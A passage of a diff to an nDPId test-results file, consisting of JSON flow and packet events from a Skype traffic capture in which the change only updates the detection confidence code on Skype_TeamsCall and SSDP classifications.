00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1431970683053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxayE3JOyrZSZGeOqASOJDTSQAAAgQFrAQCCApMXOO6PjJCqwEDAwk="} @@ -741,13 +741,13 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1431970683978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970683978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGihAAEAGpLjAqAEib91KMMhPnEhg80NCAAAAALAC\/\/8tkQAAAgQFtAEDAwUBAQgKPjJGlAAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8i9IAAEARpC3AqAEinTfrrzLdnFcAKG0ve8ECvWqBesxtVN\/+FF8A8FJFXO0bTxFAGhtLbx9IUYU="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1247,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Ni4AAEARsXfAqAEinTg0ETLdnE0AIDQfe8MCmFcjIzVltOuGOdvvgZmibnosxcEh"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431970683987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970683987,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PqwAAEARIpXAqAEiQAQXqjLdnEsAIM3ke8UC93ejJq9SbNcOBlZBFwBC35pf1nt9"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970683987,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} @@ -767,26 +767,26 @@ 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyBX4AAEARk57AqAEinTeCnTLdnE0AHhvPe8cCM2e01AKVV7JkJRCi7OoE7P+SqQ=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8MWwAAEARL9zAqAEiQAQXmzLdnEQAKCm\/e8kCIw7UNc1vAeAYbNVJreKXHNKN8e8UIdCt8moAbvU="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1287,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAABBr7UAAEARf9fAqAEi1cezjTLdnE8ALaWJe8sCd26eaxqppENRG4WXSuPXFKjQruFJphoXGEqS7tX7w9Yk1Q=="} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1288,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChckEAAAERlUbAqAEi7\/\/\/+udlB2wAjUvnTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1316,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":59237,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgeC8AAAERj1nAqAEi7\/\/\/+udlB2wAjLHaTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChI3QAAAER5BPAqAEi7\/\/\/+uLNB2wAjVB\/TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":58061,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1431970685835,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgWWQAAAERriTAqAEi7\/\/\/+uLNB2wAjLZyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685835,"flow_last_seen":1431970685835,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970685835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59052,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1431970685835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970685835,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo7Q4AAEARCkPAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 